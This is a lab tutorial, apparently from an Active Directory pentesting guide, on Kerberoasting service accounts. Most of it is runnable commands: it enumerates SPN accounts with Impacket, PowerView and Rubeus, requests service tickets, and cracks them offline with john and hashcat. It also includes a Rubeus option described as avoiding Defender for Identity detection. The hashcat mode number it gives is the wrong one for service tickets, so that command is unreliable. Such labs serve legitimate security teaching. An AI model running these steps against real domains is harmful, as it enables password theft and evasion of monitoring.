7.4 - Kerberoasting
Kerberoasting
Kerberoasting targets service accounts with an assigned SPN. When a user requests access to a service, they receive a Service Ticket (ST) encrypted with the service account’s long-term password.
If an attacker can obtain the ST, they can attempt to crack the encryption offline to retrieve the service account password.
Kerberos Ticket Exchange for Services
3) TGS-REQ (Client -> KDC/TGS)
- TGT 🔑 Encrypted with KDC key
- Authenticator Data 🔑 Encrypted with TGS Session Key
4) TGS-REP (KDC/TGS -> Client)
- ST 🔑 Encrypted with Service key
- Service Session Key 🔑 Encrypted with TGS Session Key
Unlike AS-REP Roasting, Kerberoasting requires valid domain user credentials to request a service ticket.
Example: Exploiting Kerberoasting
Step 1: Create a User with an SPN
New-ADUser -Name "kerberoasting" -SamAccountName "kerberoasting" -UserPrincipalName "kerberoasting@dev-angelist" -AccountPassword (ConvertTo-SecureString -AsPlainText "Password123!" -Force) -Enabled $true
Step 2: Assign an SPN
Set-ADUser -Identity "kerberoasting" -ServicePrincipalNames @{Add="HTTP/kerberoasting.dev-angelist.lab"}
Step 3: Verify the SPN
Get-ADUser -Identity "kerberoasting" -Properties ServicePrincipalNames
setspn -L kerberoasting

Step 4: Identify Kerberoastable Accounts
#On attacker machine create a dedicated python environment (optional)
python3 -m venv venv
. venv/bin/activate
pip3 install impacket
#Check kerberoastable users using the Impacket's module: GetUserSPNs.py
GetUserSPNs.py dev-angelist.lab/devan:'Password123!' -dc-ip corp-dc
#Or using AD Module and PowerView (Windows)
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Get-DomainUser -SPN

in this case there're two vulnerable users: 'kerberoasting' and 'angel'.
Step 5: Request Service Tickets for Kerberoasting
GetUserSPNs.py dev-angelist.lab/devan:'Password123!' -dc-ip corp-dc -request #without specifing a user it checks all possible tickets
GetUserSPNs.py dev-angelist.lab/devan:'Password123!' -dc-ip corp-dc -request-user kerberoasting | grep '\$krb5tgs\$' > kerberoast.txt
or using Rubeus:
#View statistics on Kerberoastable accounts:
Rubeus.exe kerberoast /stats
#Request a TGS for a specific user:
Rubeus.exe kerberoast /user:svcadmin /simple
#To avoid detection (e.g., MDI logging downgrade attacks), target accounts restricted to RC4:
Rubeus.exe kerberoast /stats /rc4opsec
Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec
#Kerberoast all RC4-only accounts and output to file:
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt


Step 6: Crack the Service Ticket
john --wordlist=/home/kali/Documents/password.txt ./kerberoast.txt
hashcat -m 18200 ./kerberoast.txt /home/kali/Documents/password.txt
#john.exe --wordlist=C:\AD\Tools\kerberoast\10kworst-pass.txt C:\AD\Tools\hashes.txt

Troubleshooting: Clock Skew Errors
If you encounter KRB_AP_ERR_SKEW (Clock skew too great)
, synchronize the clocks with:
sudo timedatectl set-ntp off
ntpdate -q corp-dc
ntpdate -u corp-dc
Other Resources
Labs
Last updated